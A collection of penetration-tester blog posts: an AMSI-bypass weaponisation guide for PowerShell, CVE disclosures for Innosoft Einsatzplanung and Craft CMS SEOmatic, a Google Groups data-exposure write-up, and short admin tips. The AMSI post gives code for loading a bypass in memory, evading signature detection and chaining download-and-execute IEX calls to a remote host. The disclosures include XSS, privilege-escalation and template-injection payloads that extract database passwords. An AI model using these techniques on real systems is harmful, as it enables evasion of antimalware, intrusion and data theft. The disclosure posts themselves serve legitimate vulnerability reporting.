Weaponizing AMSI bypass with PowerShell

Introduction

The Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows applications and services to integrate with any antimalware product that’s present on a machine. You can find more information on it here: https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal.

A while ago a colleague told me about an engagement in which he was running into a scenario where AMSI was unfortunately blocking his somewhat malicious PowerShell code. Due to several constraints it turned out that a lot of the known AMSI bypass techniques were not feasible for the given scenario, so I decided to do some research on AMSI and known ways of bypassing it. Long story short: there are multiple publicly known approaches to bypassing AMSI (like Component Object Model (COM) hijacking). However, for my specific scenario I ended up weaponizing a nifty bypass technique in PowerShell, based on a great approach documented by CyberArk in this blog post:

https://www.cyberark.com/threat-research-blog/amsi-bypass-redux/

I published the implementation in my GitHub repository (https://github.com/0xB455/AmsiBypass) back then, but unfortunately didn't find the time to document it here as well. After attending the "Windows PowerShell for Security Professionals" training held by @carlos_perez and @curi0usjack during this year's Troopers conference, I decided it was time to play around with some POSH stuff again, and therefore I'm now catching up on the documentation of the bypass implementation as well.

TL;DR

AMSI relies on the AmsiScanBuffer function, which takes the buffer to be scanned as well as the buffer length. As this runs in user mode, one can control the length of the buffer and can therefore bypass the processing of the actual buffer.

Game Over. AMSI is dead.

Additional information

If you want to get a better understanding of how AMSI ticks and how to break it, I can recommend the talk given by Dave Kennedy during last year's Wild West Hackin' Fest:

Weaponizing the Cyberark AMSI bypass with POSH

The general approach for applying the AMSI bypass would be compiling the C# code you can find in my GitHub repository (https://github.com/0xB455/AmsiBypass) into a managed DLL and loading it into the PowerShell console via [System.Reflection.Assembly]::LoadFile().
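
A minimal sketch of that approach could look like the following – note that the file path as well as the class and method names are placeholders, so check the repository for the actual type exposed by the DLL:

    # load the compiled bypass DLL from disk and invoke it
    # (type/method names are placeholders, see the repository for the real ones)
    [System.Reflection.Assembly]::LoadFile("C:\temp\AmsiBypass.dll") | Out-Null
    [AmsiBypass.Bypass]::Run()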

Here is how the patch from my implementation looks in action:

[Screenshot: PowerShell running the AMSI bypass]

However, from an attacker's point of view this would be undesirable, as one would be required to loudly drop a DLL on the target system. Part of my job involves working on IT forensic projects from time to time, and I've seen many cases where attackers unnecessarily dropped DLLs on their targets, leaving avoidable traces even though they were clearly trying to follow OPSEC. While touching the disk might be relevant for an attacker in order to perform DLL side-loading attacks, it should otherwise be a no-no if one does not want blue teams/IT forensic teams to easily pick up the trail. Luckily, with PowerShell one can also load an assembly reflectively in memory at runtime, which would be a proper way to execute our AMSI bypass.

So first of all we will take our compiled bypass DLL and encode it to base64:
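
A one-liner along these lines does the job (the path is just an example):

    $bytes = [System.IO.File]::ReadAllBytes("C:\temp\AmsiBypass.dll")
    [System.Convert]::ToBase64String($bytes) | Out-File AmsiBypass.b64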

Afterwards we will reflect and execute it during runtime:
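
Something like this, where $b64 holds the base64 string from the previous step (the type/method names are again placeholders):

    $assembly = [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String($b64))
    [AmsiBypass.Bypass]::Run()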

That's all we need, isn't it? Well, there is a catch. AMSI facilitates string-based detection and it is likely that certain patterns of the base64 string might end up being blacklisted (e.g. after publicly posting it on your blog 🤔). During my research I stumbled upon Andre Marques' (@_zc00l) blog and noticed that he followed a similar approach. Part of his base64 string was indeed blacklisted a while after he publicly posted it online. So one great way of avoiding this is by reflecting the DLL as a byte array in integer format:
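
Roughly like this – the sequence below is only the start of a PE header (77,90 is the "MZ" magic) and the type/method names are placeholders; the real array of course contains every byte of the DLL:

    # truncated for readability – the real array contains the full DLL byte sequence
    [byte[]]$bytes = 77,90,144,0,3,0,0,0,4,0,0,0,255,255,0,0 # (...)
    [System.Reflection.Assembly]::Load($bytes) | Out-Null
    [AmsiBypass.Bypass]::Run()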

It is very unlikely that the people working on AMSI are going to add sequences of integers to their string-based blacklist, as this would generate a lot of false positives with legitimate scripts. However, if they do so, there are still other ways around it, like XORing the bytes with a key, scrambling up the int sequence, etc.

In order to build the int byte array representation, I used the following POSH snippet and pasted the output into my script – I’m pretty sure that there are smarter ways of doing this:
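
A snippet along these lines does the trick (the file path is an example):

    $bytes = [System.IO.File]::ReadAllBytes("C:\temp\AmsiBypass.dll")
    ($bytes | ForEach-Object { [string][int]$_ }) -join "," | Out-File bytes.txt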

[Screenshot: byte array as int]

Stitching it all together

In the scenario given by my colleague it was required to:

  • pull in and execute the PowerShell code remotely via IEX(new-object net.webclient).downloadstring('https://remote.host/posh');
  • execute everything directly in memory while not touching the disk

I ended up splitting the execution into two phases.

  • Phase 1: bypass AMSI
  • Phase 2: execute dark magic

I also found myself required to insert a Start-Sleep statement in order to ensure that the malicious code is executed only after the in-memory patch has been properly applied. Chaining multiple IEX calls directly into one another gets processed immediately, and any bad stuff will still be caught by AMSI.

So here is the code snippet which is called via IEX(new-object net.webclient).downloadstring('https://remote.host/phase1'); for executing the bypass and then pulling the final code:
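
In essence the phase 1 script looks like this (byte array truncated, type/method names and URLs are placeholders):

    # phase 1: apply the AMSI bypass in memory
    [byte[]]$bytes = 77,90,144,0,3,0,0,0,4,0,0,0,255,255,0,0 # (...) full DLL as int sequence
    [System.Reflection.Assembly]::Load($bytes) | Out-Null
    [AmsiBypass.Bypass]::Run()
    # give the patch a moment before pulling phase 2
    Start-Sleep -Seconds 2
    IEX (New-Object Net.WebClient).DownloadString('https://remote.host/phase2')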

Recommendations

So, as AMSI is clearly dead by design, what is left to do for the blue team? Basically you won't be able to stop this kind of bypass. I recommend putting your energy into implementing more transparency through proper logging of script blocks and alerting on unusual code statements being run on your systems. Watch out for anomalies and alert on them. For instance, [Reflection.Assembly] is something that most PowerShell scripts won't be executing on a daily basis in your environment, right? If it shows up, you might have interesting PowerShell use cases or possibly a security problem 😉
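
For reference, script block logging is normally rolled out via GPO; the same setting can be flipped locally through the policy registry key – a quick sketch, to be adapted to your environment:

    # enable PowerShell Script Block Logging
    $key = "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging"
    New-Item -Path $key -Force | Out-Null
    Set-ItemProperty -Path $key -Name EnableScriptBlockLogging -Value 1
    # resulting events land in Microsoft-Windows-PowerShell/Operational (event ID 4104)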


CVE-2019-15305 – CVE-2019-15309 Several Security Vulnerabilities in “Innosoft Einsatzplanung Web” Version 5.2q4

During a security assessment, several security vulnerabilities were discovered by my colleagues Florian Moll and Nico Jansen in the Innosoft Einsatzplanung Web software, version 5.2q4. The vendor was informed about the existence of the vulnerabilities in May 2019. This blog article describes the discovered vulnerabilities in detail.

Stored Cross Site Scripting

Authenticated users are allowed to modify their username. The username is displayed on the web page. By setting JavaScript code as part of the username, the code will be executed in the user's web browser as soon as he/she logs in again. The function is reachable via the /innosoft/UserSettings/Save URL. The affected parameter is called "FullName". The following snippet contains a JSON object including the payload.

(…)
"GeneralSettings": {
    "FullName": "<script>alert(\"XSS\")</script>",
(…)

Privilege Escalation / Insecure Permissions

Low-privileged, authenticated users are able to gain administrative access. This is possible by updating the user profile, which means the vulnerability is also reachable via the /innosoft/UserSettings/Save URL. The "Privfa" parameter contains permission flags, which can be modified by the logged-in user. By changing those values, administrative access can be obtained, for example by sending the following JSON object:

(…)
{
    "Code": 0,
    "Message": null,
    "Data": {
        "User": { (…)
            "Privfa": "111111111111111111111111111000",
(…)

Broken Access Control

Authenticated, non-administrative users are able to view and edit personal information of other users. By calling the URL /innosoft/UserSettings/Get/?id=[Username] it is possible to view other users' profiles. Also included in this information is the password, which was secured with a rotational cipher algorithm that is easily reversible (see Usage of insecure encryption algorithms). This allows any authenticated user to view the clear-text password of any other user, including administrators. User information is returned as JSON in the following format.

{
    "Code": 0,
    "Message": null,
    "Data": {
        "User": {
            "Name": "[Username]",
            "Passwort": "[Password]",
            "Name2": "[Username]",
            "Sprache": 1,
(…)

In addition, non-administrative, authenticated users are able to modify the profile of any other user. This also includes changing other users' passwords. This is again possible by modifying the profile change request before sending it to the server. Again, the modified data can be posted to the URL /innosoft/UserSettings/Save. The following snippet contains a sample payload in JSON format.

{
    "Code": 0,
    "Message": null,
    "Data": {
        "User": {
            "Name": "[Username to overwrite]",
            "Passwort": "[
(…)

Usage of insecure encryption algorithms

The passwords of all users are stored in the database after encrypting them using a modified rotational cipher which works as follows: an offset is initialized as 1 and increased for each letter in the password. Based on the ASCII table, the letter is replaced by [letter+offset]. The letter "a" at the first position would, for example, result in "b"; at the second position it would result in "c". If the new character is outside a specific range, it wraps around and results in the letter after wrapping.

This algorithm is cryptographically insecure and allows the calculation of the clear-text password within milliseconds. In addition, it is easy to generate a collision (two passwords mapping to the same "hash"). For example, it is possible to set a user's password to "/" and log in successfully using the password "z".
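
A rough reimplementation of the described scheme illustrates the point; the exact wrap-around boundaries are an assumption on my part (a range of '0'..'z' reproduces the "/" vs. "z" collision):

    # naive re-implementation of the described rotational cipher
    # LO/HI are assumed wrap boundaries, not taken from the product's code
    LO, HI = ord("0"), ord("z")

    def innosoft_encrypt(password: str) -> str:
        out = []
        for i, ch in enumerate(password, start=1):   # offset starts at 1 and grows per letter
            c = ord(ch) + i
            if c > HI:                               # wrap around when leaving the range
                c = LO + (c - LO) % (HI - LO + 1)
            out.append(chr(c))
        return "".join(out)

    print(innosoft_encrypt("/"), innosoft_encrypt("z"))   # both yield "0" -> collision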

Security Misconfiguration

The maximum allowed password length is limited to only 8 characters. In addition, there is no password complexity policy enforced. As a result, it is possible to set passwords of one letter in length. Even if a secure hash algorithm like SHA256 were used, these passwords would be easily brute-forceable due to their low complexity.

Timeline

  • <2019-05: Vulnerabilities were discovered
  • 2019-05-17: Innosoft was informed about the vulnerabilities
  • 2019-08-06: Innosoft confirmed the vulnerabilities and fixed them in the next release
  • CVE-IDs (CVE-2019-15305 – CVE-2019-15309) were assigned
  • XXXXXXXX: Public disclosure

Exploitation of Server Side Template Injection with Craft CMS plugin SEOmatic <=3.1.3 [CVE-2018-14716]

During a recent web application test I decided to perform some fuzzing of certain paths within the URI of a CMS and happened to find a potential SSTI (server-side template injection) within one of the CMS's plugins, which I was then able to successfully exploit for information disclosure. In this post I want to share my approach on how I moved forward with the analysis.

Introduction

So here is the SSTI which I stumbled upon during my initial fuzzing. You can see that I was able to trigger some math logic which is processed by the template engine on the server and then reflected in the canonicalUrl, which is part of the Link header within the response:

[Screenshot: initial injection point]
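
In essence, the probe and response looked something like this (host and path are made up for illustration):

    GET /some-page/{{7*7}} HTTP/1.1
    Host: victim.example

    HTTP/1.1 200 OK
    Link: <https://victim.example/some-page/49>; rel='canonical'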

First of all: what is this about? Basically, SSTI is a scenario where user input is unsafely embedded into a template. Most of the time it is related to issues where user-defined input is directly concatenated into the template; if this input contains a template expression, it will be evaluated by the server.

However, if this type of vulnerability is new to you, make sure to visit the PortSwigger blog and read this article by James Kettle (@albinowax). You won't regret it; it is a great addition to the topic of web application security. His research is also available as a printable whitepaper and was presented at Black Hat 2015 (paper/video). I was already aware of the basic concept behind this vulnerability, but this was the first time that I actually encountered it out in the wild, so I decided to freshen up my knowledge and read through James' paper on the topic.

After sharpening my understanding of this kind of weakness I got eager to perform a proper exploit, and my first approach was to take the easy route by leveraging an automated exploitation tool called TPLMAP (https://github.com/epinna/tplmap). (Un)fortunately my braindead fire-and-forget methodology was not successful and I was forced to properly look into the subject, which allowed me to actually learn a few new things:

[Screenshot: TPLMAP failing]

Back to the drawing-board

Okay, we just hit the script kiddie wall. Let me take you on the journey of how to proceed from here. First of all: let's step back, take a breath and evaluate the situation by breaking down the informational facts.

We definitely know that we can inject arbitrary stuff which is processed by the template engine and based on the response given in the header we can assume the site is running on Craft CMS (https://craftcms.com):

[Screenshot: header responses]

Unfortunately it does not leak the exact version number, but for starters we can simply try to leverage the latest documentation, and according to this documentation Craft is using Twig (which is one of the PHP template engines covered in James' research).

So let's have a comprehensive look at the documentation; this will actually help us a lot with our ambitions and sharpen our understanding of how the CMS and the template engine interact with each other. It is also super useful for understanding the architecture and the actual objects, methods and syntax of both components.

It is also always recommended to check older/known/existing vulnerabilities for your target and, if available, evaluate the code to understand what was changed and fixed during consecutive releases. Any of this might spark some ideas in your head. In my case there were a few known issues which I reviewed. For example:

As mentioned, understanding older vulnerabilities can always be a good addition to one's own approach. Even though the issue is already fixed, the formerly present SSTI vulnerability listed above is a good example, as you can find some interesting ideas by reading up on how they created the PoC for this vulnerability.

And finally if this is an option: download the source code and have a look at the internals!

If you tried leveraging automatic exploitation and reconnaissance tools (TPLMAP) make sure to understand what they do and how they do it.

Fun fact: the utilization of Twig within Craft CMS also explained why my attempt with TPLMAP did not deliver any loot in the first place, as Twig is not supported by the tool:

[Screenshot: TPLMAP supported engines]

Based upon our informational ramp-up we can tell that, according to James' research, Twig's _self object and its env attribute are the way to go in order to get Remote Code Execution (RCE):
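
The payload documented in that research looks roughly like this (Twig v1 syntax):

    {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}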

So let us try to call it via the injection point. In my case I found that _self is not an object but merely a string returning the template’s name:

[Screenshot: _self is a string, not a referenceable object]

According to the documentation and other statements, it turns out they changed that when moving from Twig v1 to Twig v2. So we are dealing with an updated Twig version that is not prone to the vulnerabilities disclosed in James' research. At the current point in time there seems to be no publicly available exploit alternative for Twig v2 (which should also be the reason that TPLMAP currently does not support Twig exploitation).

Well, so no easy-peasy exploitation for us.

But… there is still hope.

Getting creative

Even though there is currently no well documented way of exploiting the Twig v2 template engine, we can still try our best to interact with the components of the CMS via the identified injection point. According to the Craft CMS documentation there are plenty of interesting objects, filters and methods which can be called from the template. It also seems that we can call objects and methods from Craft CMS itself. According to the documentation we should be able to query the editable sections:

[Screenshot: sample method from the documentation]

So let’s give it a try…
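
From my recollection the corresponding template call looks roughly like this – treat the exact variable and method names as an assumption on my part and check the Craft documentation for the real ones:

    {{ craft.sections.getEditableSections() }}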

[Screenshot: reading out editable sections]

Fancy! We got an array back, so our stuff seems to be working. Let’s hunt something more juicy now. Digging through the documentation reveals one specific method that seems very promising as it allows us to read information from the configuration files (this is also what some people used to exploit Craft CMS with former vulnerabilities):

So let’s have a look at the configuration files and pick out something nice:

[Screenshot: content from db.php]

Plenty of juicy stuff which we can try to access, but this time we need to pass some parameters to the craft.config.get() method. Let's try for the password entry within the db.php file:
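
Based on my reading of the documentation, the intended call would be something along these lines, with the second argument selecting the config file:

    {{ craft.config.get('password', 'db') }}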

[Screenshot: encoded control characters]

(Un)fortunately the framework ships with some protection features which sanitize control characters by replacing them with corresponding HTML entities. When stumbling into such issues it is usually a good approach to perform some evasive maneuvers; for instance, sometimes you get lucky by evaluating exotic character escape sequences or encoding schemes which might bypass the filter. After spending some time analyzing the filter behavior I came to the conclusion that it was quite robust, so a change of strategy was required. As I went back to reading the Craft documentation I started playing around with all of the available functions. The craft.request set looked quite interesting to me, and while reading about the supported methods I finally stumbled upon this precious gem:

[Screenshot: getUserAgent]

A quick test shows that this function indeed is reflecting the value of the client’s User-Agent header. As you can see the output is again sanitized with HTML entities:

[Screenshot: craft.request.getUserAgent()]

In order to pass the return value on to another method we now simply need to use Twig's set tag (https://twig.symfony.com/doc/2.x/tags/set.html) and store the result in a new variable:
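
For example (taking the getUserAgent() value from above):

    {% set ua = craft.request.getUserAgent() %}
    {{ ua }}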

[Screenshot: working with variables in Twig]

This allows us to store and reflect values in a more flexible way. As we need to store two parameter values within our User-Agent string, we either need to use a second method as a springboard or we can use Twig's filters in order to perform some string manipulation. In this case I am utilizing slice() (https://twig.symfony.com/doc/2.x/filters/slice.html), which allows us to combine multiple values within our User-Agent header, as shown in the combined payload below.

Putting it all together

So far we have learned quite some stuff about the CMS and the template engine in scope. Based upon our knowledge we can now properly try to access sensitive information on our target by calling methods while passing on arbitrary variable values. The syntax should look something like this:
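
A sketch of the combined payload: the request is sent with the User-Agent header set to the string passworddb, while the injected template code carves out the two parameters and feeds them to craft.config.get() (the slice offsets obviously depend on the chosen string):

    {% set ua = craft.request.getUserAgent() %}
    {% set setting = ua|slice(0, 8) %}   {# "password" #}
    {% set file = ua|slice(8, 2) %}      {# "db" #}
    {{ craft.config.get(setting, file) }}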

Let’s give it a try and extract the database password from the config file of our target:

[Screenshot: extracting the DB password]

At this point we have access to a broad variety of methods. For instance, we can iterate through all CMS users, take their email addresses and let them know that their site requires a security fix:
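
Roughly along these lines – again based on my reading of the Craft template docs, so take the exact variable names with a grain of salt:

    {% for user in craft.users.find() %}{{ user.email }}, {% endfor %}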

Here are some samples which I found to be of interest:

[Screenshot: extracted loot]

Conclusion

It turns out that the issue was caused by a CMS plugin called SEOmatic, which you can find out more about here: https://straightupcraft.com/craft-plugins/seomatic and here: https://github.com/nystudio107/craft-seomatic

According to the developer the attack only works for URLs that are not associated with a corresponding Entry in Craft CMS. The reason is that the default setting for the canonicalUrl field was the Twig code:

The way SEOmatic works, the global settings are a fallback only if nothing else matches. Most pages will match an entry, category, or product of some kind or other, and in those cases the canonicalUrl would not be set to the offending Twig code, so the exploit wouldn't work.

So you'd need to be attacking a URL that both exists as a Twig template (so it doesn't throw a 404) and also does not have an entry, category, or product associated with it.

I am happy to confirm that the developer fixed the issue right after it was reported. You can find the fixed version at: https://github.com/nystudio107/craft-seomatic/releases/tag/3.1.4

And here is the commit fixing the issue: https://github.com/nystudio107/craft-seomatic/commit/1e7d1d084ac3a89e7ec70620f2749110508d1ce1

Evaluation of impact:

As we live in a beautiful Information Age, it is now time to determine how many publicly available Craft CMS instances on the internet may be impacted by the vulnerability. Let's pull and evaluate some data from Shodan.io (side note: some people asked me how I found their website in the first place – this is how):

[Screenshot: collecting data from Shodan]

In order to be able to process the information further I will split this up into multiple files which are grouped by port numbers:

[Screenshot: grouping the data by port numbers]

Unfortunately we are only able to query the Shodan API for string values which are contained within the data sections of the information that was collected by Shodan. So I want to make sure that I am filtering for entries which actually have a proper Link header included and therefore might be affected by the vulnerability:
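
Conceptually, this filtering step boils down to something like the following (filenames are made up; the Shodan export is line-based JSON):

    # keep only hosts whose banner data actually contains a Link header
    zcat craft_results.json.gz | jq -r 'select(.data | test("Link:")) | .ip_str' > candidates.txt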

[Screenshot: sanitizing the Shodan data]

So 244 out of 269 are left. Time for the final shot: let's crawl the remaining targets and see what's left:

[Screenshot: vulnerable hosts]

Overall I identified 65 vulnerable targets, which could have been worse. I then simply dumped the email addresses of ~300 admin accounts and let them know about the problem. A bunch of them quickly got back to me and acknowledged that they had updated their installation properly. As the developer also pointed the matter out on Twitter, most people should be running a fixed version soon:

https://twitter.com/nystudio107/status/1021847835418009605

Final words:

Leveraging existing scanning and exploitation tools is always easy. But once you hit a wall, spend some time sharpening the axe before cutting down the tree. Make sure to identify and process comprehensive information in order to get a better understanding of your target. It will pay off in the end. At the very least you will have learned something new.

Timeline:

  • 2018-07-19: Discovered
  • 2018-07-23: Vendor notified
  • 2018-07-24: Version 3.1.4 released, issue resolved
  • 2018-07-29: CVE-2018-14716 assigned
  • 2018-07-30: public disclosure
  • 2018-07-31: PoC added to Exploit-DB

Comprehensive data leakage via Google Groups

So, a few days ago Brian Krebs posted an article on his blog called "Are Your Google Groups Leaking Data?". This article reached me while I was chilling in the sun, but it did not really surprise me, as I had been researching the very same topic right before going on my vacation. Actually I wanted to release this information a few weeks ago, but mutually agreed with the guys from Google to wait until we had a chance for a direct talk, which was scheduled right after my vacation (a.k.a. today).

At the current point in time there is not much left to be added, as you can find most of the interesting information already published in the article from the researchers at Kenna Security and in Brian's write-up (or you can have a look at the original advisory from RedLock, which even dates back to July 2017). However, as I already had my stuff written up, I wanted to get it out as well. At the very least it may help to spread the word and make sure that affected Google customers remediate the issue.

For me it all started a few weeks ago with a colleague pointing me to a post by @JGamblin on Twitter:

As I am currently working with different organizations which are using G Suite on a corporate level, I wanted to have a closer look at the matter and was shocked by the results. As luck would have it, we had a representative from Google Cloud's Professional Services at our office, so I could share my results with him directly. He was quite concerned with the matter and decided to hook me up with the PO for Google Groups directly. As I was about to hit my vacation, I promised to deliver a quick write-up concerning my observations and we scheduled a phone call and a disclosure for when I would return.

As I was sitting on a big pile of juicy loot I decided to contact some of the affected organizations manually, but quickly realized that it was too much effort for me to contact all of them. As I was confident that the information would get into more and more hands, I wanted to bring the topic up to Google before disclosing the issue further. At the very least the articles mentioned above proved me right on this…

So, today I finally had the chance to talk with Google and offered them my point of view on the matter. Overall it was a quite constructive chat and they assured me that they have taken actions in order to directly contact and inform their customers who might be affected by the issue. Right now I can confirm that only a small subset of the affected customers have fixed this.

During our talk Google agreed with my point of view that the overall presentation of privacy implications within the web frontend is not very clean. Given that, they also confirmed that they are currently evaluating how to improve the visual representation. So expect a blinking 90's gif, marquee text and an alarm sound soon!

   

We also discussed some other ideas they had in mind for how the overall security/privacy controls of the solution could be enhanced. As most of this would require larger changes to the overall architecture, I personally feel it is unlikely they are going in this direction any time soon.

Well, all that is left for me to do now is to once again appeal to G Suite administrators to check their privacy configurations, make sure to have a look at Google's recommendations, and pay attention to the article published by Kenna Security. They did a good job describing the overall problem, the potential impact as well as the mitigation process, so I will not pick up those topics here. If you want to get in touch with me, feel free to hit me up on Twitter @0xB455

TL;DR

If you are using Google Groups and your domain is configured to "Public on the internet", you should audit the visibility of each group. Even though you believe that your sensitive groups are properly protected (as they might not be listed in your public directory index), they still might be publicly accessible without any authentication. Currently several thousand domains are affected…

So without further ado: here is the little write-up from May which I supplied to Google (featuring fancy lolcat output – simply because it rulez):

 

=== BOF ===

Get the party started

Hi folks, as described earlier today the original root cause for my investigation was the fact that we came across an issue where it was possible to publicly access confidential content within Google Groups without being authenticated within our domain. We raised the issue with our internal G Suite admins and they jumped on having a look at the privacy settings for our domain.

After sprinkling some magic dust they replied back to me that they applied proper changes towards the privacy configurations within our domain.

So I had another look and noted that our admins had applied changes to the visibility of groups within the index directory for our Google Groups domain. Seemed good to me, as it was no longer readable without proper authentication. This was accomplished by revoking the listing option from each group.

However I found that it was still possible to publicly access confidential content by either having direct links towards the individual groups or by simply utilizing the search functionality.

I immediately replied back to our admins and we had a more detailed look at the privacy settings again. After some digging through the permission settings we were finally able to determine that some users had accidentally configured the permissions for their groups by selecting the option "All organization members".

As we were running our domain with the "Public on the Internet" permission, this ultimately resulted in unauthenticated users being able to access the misconfigured groups:

Also consider a scenario where users within a private Google Groups domain get used to applying the "All organization members" option to their groups. Later on, the "Outside this domain – access to groups" configuration gets switched to "Public on the Internet" without anyone noticing that individual groups are now being exposed to the public.

 

Eventually we ended up with a very bad feeling in our stomachs and I asked our admins to switch the domain to complete private mode. We will now reconsider our use cases related to the G Suite products and perform proper risk assessments for them.

 

Seems shady

Okay, let's have a detailed breakdown of what went wrong here.

  1. we are visiting a publicly accessible domain within Google Groups
  2. we are validating which groups are listed within the domain
  3. we are trying to access groups with juicy names and descriptions; no luck… sadface!
  4. we search for sensitive content within the group; no luck again… sadface!
  5. we search for sensitive content within the whole domain; et voilà!

    data anonymized for public disclosure

  6. we visit the unlisted group and have a look around …

    data anonymized for public disclosure

  7. … and get our hands on some nice information … profit!

    data anonymized for public disclosure

 

What could possibly go wrong? ¯\_(ツ)_/¯

As I was pretty sure that we were not the only people on the planet running into those unwanted configurations, I decided to perform an evaluation of the Alexa top 1 million popular websites. Therefore a colleague and I quickly hacked up a crawler with some Python code, and within several hours the tool was able to identify about ~6,000 valid domains of Google G Suite customers which were generally running their Google Groups in public mode:
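
The core idea boils down to something like the sketch below – the reachability heuristic and URL format are my assumptions for illustration, not the exact crawler we used:

    # rough sketch: check whether a domain's Google Groups frontend is reachable without authentication
    import requests

    def groups_public(domain: str) -> bool:
        url = f"https://groups.google.com/a/{domain}/forum/"
        try:
            r = requests.get(url, timeout=5, allow_redirects=True)
        except requests.RequestException:
            return False
        # assumption: private domains bounce the visitor to a Google login page instead
        return r.status_code == 200 and "accounts.google.com" not in r.url

    with open("alexa_top1m_domains.txt") as fh:
        for domain in (line.strip() for line in fh):
            if domain and groups_public(domain):
                print(domain)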

Next up I decided to have a closer look and fired off some sample queries within the individual domains in order to identify Google customers who had unintentionally misconfigured their privacy settings in a similar manner as we did before. Basically I was utilizing some search patterns in order to identify unlisted groups and later on validated which of those were not explicitly included within the overall index (and therefore likely to be of a confidential nature).

I was still thinking about the implications of my findings and decided to do some data mining within those groups, trying to evaluate the possibilities of actually gaining access to confidential and sensitive content. Soon after performing some very basic reconnaissance I was sitting on all kinds of sensitive data of Google customers… PayPal accounts with larger balances waiting to be withdrawn, private keys and certificates used for trusted communication, credentials for web services or cloud/network infrastructure, confidential employee information, all sorts of financial information and, last but not least, a lot of GDPR-relevant personal data from end customers and private persons…

Of the ~6,000 domains, nearly 30% (~1,800 domains) were actually leaking sensitive data. As a PoC here is an extract showing some of the loot which I was able to identify; feel free to check the links for yourself:

data anonymized for public disclosure

Please consider that we are merely talking about around 6,000 potential targets that I identified by using a common domain list. The real footprint of affected domains and customers would be somewhat higher than what is included within the Alexa top list. A malicious and determined threat actor aiming to exploit the issue on a larger scale will likely hit more domains than the ones I hastily evaluated with the crawler. I am confident that we can extrapolate this number to at least a few thousand additional domains.

 

Room for improvement

So here is what I recommend in order to mitigate the issue.

First of all: let your affected customers know that they might have a problem with their data being publicly exposed.

Second: I believe that Google should improve the user interface for their customers and get rid of misleading or opaque aspects within the UI. Whenever someone is about to set a privacy setting which could lead to complete public exposure, there should be a proper warning presented. Basically: whenever users are in danger of exposing content from their domain to the public internet, Google should turn on the red lights and an alarm signal…

Currently the tooling for managing G Suite on a larger scale is limited. We found that by tinkering with tools such as Google Apps Manager (GAM) it is possible to run a batched evaluation of all objects within the G Suite domain. But implementing some kind of native audit feature within the web frontend would be a huge benefit for administrators.

 

Conclusion

Depending on the individual scenario, users and administrators of Google Groups might unknowingly run into misconfigurations of their privacy settings. This can result in data leaks. For companies whose organization and communication heavily rely on Google Groups, this can have a huge impact.

Digging through all the relevant privacy settings within G Suite is not very intuitive and can be a challenging task for admins. Cleaning up or auditing an existing and possibly misconfigured domain might be a challenging task as well. Making use of tools like the Google Apps Manager can mitigate the hassle.

I understand that the discussed issue does not lie within the core functionality of Google Groups per se and that this is not a technical security issue within the product. It is rather related to configuration errors which are unintentionally introduced by users. Handling the entangled collection of privacy controls and assessing their implications can be challenging.

I personally feel that it is Google's duty to make their customers (admins and users) more aware of the potential risks and implications of the individual privacy controls within G Suite. I feel that Google needs to consider how the ramifications of those controls can be presented to the user in a better and more transparent way.

 

=== EOF ===


Pingsweep with Windows CLI

I just happened to find myself with the requirement of performing a ping sweep of the local /24 network under Windows without installing any additional software or tools.

Turns out you can do that quite easily via the commandline:
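
For example, for a 192.168.1.0/24 network (adjust the prefix to your own subnet; use %%i instead of %i inside a batch file), the following one-liner from cmd.exe prints a reply line for every host that answers:

    for /L %i in (1,1,254) do @ping -n 1 -w 100 192.168.1.%i | find "TTL="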

 


Creating dummy files in Windows

If you want to create dummy files in Windows, you can simply create them by using fsutil:
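
The general syntax is (size is given in bytes):

    fsutil file createnew <filename> <size in bytes>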

So in order to create a bulk file which is 1 GB in size you can go with:
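
For instance (the filename is arbitrary; 1 GB = 1,073,741,824 bytes):

    fsutil file createnew dummy.bin 1073741824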


Feeding content from Burpsuite into other tools e.g. sqlmap

If you ever wonder how to forward your content from Burp Suite to any other tool, keep in mind that there is a logging option available.

Enable logging within Burp and pass the log file as input to sqlmap:
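
sqlmap can read targets straight from a proxy log via its -l option (the log file name is whatever you configured in Burp):

    sqlmap -l burp_proxy.log --batch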

 


Carving the filesystem for large files under linux

Find files which are greater than 20MB:

find / -size +20000k -exec du -h {} \;


Carving the filesystem for recently created files in linux

Files created or modified less than 48 hours ago, sorted from the newest to the oldest:
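
With GNU find, something along these lines works:

    find / -type f -mtime -2 -printf '%TY-%Tm-%Td %TT %p\n' 2>/dev/null | sort -r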


Copy datastreams via SSH

I just realized that one can push or pull data streams through SSH as well. I just used it with dd and it saved me a lot of time.

pushing with DD:
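
For example, imaging a local disk onto a remote machine (device, user and host are placeholders):

    dd if=/dev/sda | ssh user@remote.host "dd of=/data/sda.img"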

 

pulling with DD:
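
And the other way around, pulling an image from the remote machine to the local box:

    ssh user@remote.host "dd if=/dev/sda" | dd of=sda.img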

 

 
